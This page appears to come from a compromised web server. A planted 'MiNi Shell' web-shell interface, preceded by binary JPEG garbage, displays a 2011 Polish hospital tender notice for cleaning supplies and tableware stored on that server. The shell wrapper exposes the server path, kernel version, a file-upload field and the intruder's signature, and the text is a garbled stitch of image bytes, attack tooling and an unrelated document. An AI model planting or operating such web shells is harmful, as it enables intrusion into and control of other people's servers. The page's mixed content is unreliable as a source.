JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110211/50387-N-2011.html

<p class="kh_header"><b>Lublin: Dostawa artykułów gospodarczych i czystościowych - EO/EZ-2734/5/11</b><br>
<b>Numer ogłoszenia: 50387 - 2011; data zamieszczenia: 11.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 1 w Lublinie , ul. Stanisława Staszica 16, 20-081 Lublin, woj. lubelskie, tel. 081 5323935, 5325043, 5328330, faks 081 5329486.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spsk1.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów gospodarczych i czystościowych - EO/EZ-2734/5/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 9 zadań - artykuły gospodarcze i czystościowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.80.00.00-0, 39.22.21.10-8, 39.22.11.10-1, 33.72.10.00-0, 33.71.19.00-6, 33.72.12.00-2, 39.83.17.00-3, 39.51.42.00-0, 31.41.10.00-0, 19.50.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku Zamawiający dokona na podstawie dokumentów określonych w części VI.A pkt 1 SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku Zamawiający dokona na podstawie dokumentów określonych w części VI.A)  pkt 1 SIWZ, z zastrzeżeniem pkt. 2 cz. V SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku Zamawiający dokona na podstawie dokumentów określonych w części VI.A)  pkt 1 SIWZ, z zastrzeżeniem pkt. 2 cz. V SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku Zamawiający dokona na podstawie dokumentów określonych w części VI.A)  pkt 1 SIWZ, z zastrzeżeniem pkt. 2 cz. V SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku Zamawiający dokona na podstawie dokumentów określonych w części VI.A) pkt 1 z zastrzeżeniem pkt. 2 cz. V SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarto w projekcie umowy stanowiącym załącznik nr 13 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spsk1.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Kliniczny Nr 1 w Lublinie, ul. St. Staszica 16, 20-081 Lublin, Sekcja ds. Zamówień Publicznych, Budynek Dyrekcji - pokój nr 1Cena SIWZ: 10 zł + 23% VAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2011 godzina 09:30, miejsce: Kancelaria Szpitala, pokój nr 9              
Ul. Staszica 16, 20-081 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Nóż plastikowy jednorazowego użytku, op. a 100 szt. -19 200 szt.2.	Widelec plastikowy jednorazowego użytku, op. a 100 szt. - 20 400 szt.3.	Łyżka stołowa plastikowa jednorazowego użytku, op. a 100 szt. - 21 600 szt.4.	Talerze plastikowe jednorazowe płytkie, śr. 23 cm, op. a 100 szt. - 25 600 szt.5.	Flaczarka plastikowa jednorazowa 350 ml, op. a  100 szt. - 9 600 szt.6.	Talerze plastikowe jednorazowe, głębokie, poj. 400 ml, op. a 100 szt. -16 000 szt.7.	Kubeczki plastikowe jednorazowe poj, 250 ml., op. a 100 szt. - 16 000 szt.8.	Pojemniki  PP, okrągły, jednorazowego użytku, poj. 500 ml., przystosowany do przewożenia zup, wytrzymały na temperaturę ok. 120°C - 30 000 szt.9.	Wieczka okrągłe, pasujące do pojemników wymienionych w pozycji nr 8 - 30 000 szt.10.	Worki białe lub przeźroczyste, jednorazowego użytku, z folii z rączka, poj. ok. 20 kg - 24 000 szt.11.	Worki białe lub przeźroczyste, jednorazowego użytku z folii o wymiarach 26x35 cm - 180 000 szt.12.	Folia spożywcza w rolce szerokość 30 cm, długość 250 m - 24 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.22.21.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dzbanek nierdzewny poj. 2 - 2,5 l z uchwytem i dzióbkiem do nalewania-24 szt.2.	Kubek porcelitowy lub typu Arcoroc z uchwytem, poj. 200 - 250 ml-360 szt.3.	Łyżka stołowa obiadowa ze stali nierdzewnej, poddająca się dezynfekcji i sterylizacji, łatwa do czyszczenia, nie czerniejąca-480 szt.4.	Nóż stołowy obiadowy ze stali nierdzewnej, poddający się dezynfekcji i sterylizacji, łatwy do czyszczenia, nie czerniejący-180 szt.5.	Widelec stołowy obiadowy ze stali nierdzewnej, poddający się dezynfekcji i sterylizacji, łatwy do czyszczenia, nie czerniejący-360 szt.6.	Łyżeczka mała do herbaty ze stali nierdzewnej, poddająca się dezynfekcji i sterylizacji, łatwa do czyszczenia, nie czerniejąca-200 szt.7.	Łyżka wazowa - chochla, poj. 0,25 l ze stali nierdzewnej, poddająca się dezynfekcji i sterylizacji, łatwa do czyszczenia, nie czerniejąca -20 szt.8.	Łyżka kuchenna duża ze stali nierdzewnej, poddająca się dezynfekcji i sterylizacji, łatwa do czyszczenia, nie czerniejąca, dł. min. 30 cm-48 szt.9.	Talerz płytki obiadowy, porcelitowy lub typu Arcoroc, śr. min. 24 cm-360 szt.10.	Talerz głęboki obiadowy, porcelitowy lub typu Arcoroc, śr. min. 24 cm, poj. min. 400 ml-420 szt.11.	Talerz deserowy, porcelitowy lub typu Arcoroc, śr. min. 18 cm-360 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 39.22.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Specjalistyczna sól do zmywarki typu Calgonit , o działaniu zmiękczającym wodę, chroniąca przed osadzaniem kamienia op. a 1 - 1,5 kg-72 kg 2.	Mleczko uniwersalne typu Ciff, skutecznie usuwające wszelkiego rodzaju osady, brud i tłuszcz, kamień, rdzę i pleśń, delikatne, nie rysujące powierzchni, nie pozostawiające osadów i zacieków, wydajne o doskonałych właściwościach czyszczących, nadające połysk do powierzchni emaliowanych, ceramicznych i chromowanych w kuchni i w łazience, op. a 0,5 - 1 l-25 l3.	Żel do mycia i dezynfekcji toalet typu Domestos, o działaniu czyszczaco-dezynfekującym, o dużym stopniu gęstości, skutecznie usuwający kamień i zabijający bakterie, op. a 0,75 - 1,25 l-25 l4.	Silny środek usuwający tłuszcz typu Cilit Bang, wydajny, łatwo usuwający tłuste osady i plamy, op. a 0,5 - 0,75 l-22,5 l5.	Płyn usuwający kamień i rdzę typu Cilit, skuteczny, wydajny, do stosowania w kuchni i w łazience, op. a 0,45 - 0,5 l-15 l6.	Płyn uniwersalny typu Yplon, do mycia powierzchni, o przyjemnym zapachu, skutecznie usuwający zabrudzenia, nadający połysk, nie pozostawiający smug, op. a 3 - 5 l -60 l7.	Pianka antystatyczna do czyszczenia plastików i metalowych powierzchni sprzętu komputerowego (obwodów, monitorów, drukarek, itp.) (op. a 400ml/400g) +/- 20%-10 szt.8.	Zmywak stalowy, spiralny, o wadze 40 g-720 szt.9.	Szczotka do rąk, plastikowa-720 szt.10.	Ściereczki bawełniane, wykonane z wysokiej jakości włókien, grube, trwałe, wysoko chłonne, miękkie i przyjemne w dotyku, przystosowane do prania w temp. 60°C-100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.51.42.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mydło w płynie do higienicznego mycia rąk, zapachowe, do częstego stosowania, nie powodujące alergii i wysuszania skóry rąk, pielęgnujące skórę poprzez jej delikatne natłuszczanie i nawilżanie, dobrze pieniące i dobrze spłukujące, wydajne, o średnio zagęszczonej konsystencji, nie powodujące zapychania dozowników, op. a 5 - 6 l-7 200 l2.	Mydło w płynie, sterylne, syntetyczne, 1-razowego użytku w woreczkach. Posiadające specjalną zastawkę dozującą, chroniącą zawartość worka przed wtórną kontaminacją mikroorganizmami z otoczenia, nie zawierające substancji konserwujących, do higienicznego i chirurgicznego mycia rąk, dobrze pieniące się, o przyjemnym, delikatnym zapachu, zapakowane w jednorazowe worki, (kompatybilne) pasujące do dozowników ściennych typu Sterisol op. a 700 - 750 ml-480 l3.	Mydło do mycia skóry noworodków, antyalergiczne, nie zawierające barwników, substancji zapachowych, posiadające dobre właściwości myjące, dozowanie w postaci piany, opakowania dostosowane do dozowników typu Dermados, op. a 400 - 450 ml  -126 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.19.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bateria LR 03-400 szt.2.	Bateria LR 06-3 000 szt.3.	Bateria LR 14-350 szt.4.	Bateria LR 20-100 szt.5.	Bateria 9V alkaiczna 6LR61-500 szt.6.	Bateria CR 2032, 3V-300 szt.7.	Bateria SR V 13 GA do glukometrów, 1,55 V-300 szt.8.	Bateria DL 1/3 N 3V-30 szt.9.	Bateria MN21-30 szt.10.	Bateria GP 192 do termometrów elektrycznych-150 szt.11.	Bateria t. 123 litowa-25 szt.12.	Bateria 3R12 4,5V-2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.41.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dozownik na mydło w płynie / preparat dezynfekcyjny do rąk - 50 szt.2.	Dozownik na papier toaletowy - 50 szt.3.	Dozownik na ręczniki jednorazowe - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.17.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Golarka medyczna typu Gallant 1-razowego użytku, posiadająca jedno ostrze wykonane ze stali nierdzewnej, wyposażona w specjalny grzebień zapobiegający zapychaniu ostrza. Konstrukcja uchwytu w formie płytki umożliwiająca łatwe odłamanie ostrza po zakończeniu golenia oraz bezpieczne wyrzucenie do pojemnika na zużyty ostry sprzęt jednorazowego użytku. Wycięcie w uchwycie umożliwiające dokładny widok golonego obszaru, op. a 50 szt. - 6000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.72.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maszynka do golenia 1-razowego użytku z podwójnym ostrzem, pakowana indywidualnie, opakowanie zbiorcze a 50 szt. - 3500szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.72.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gumki recepturki op. a  25 g, śr. 40 mm - 480 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.50.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com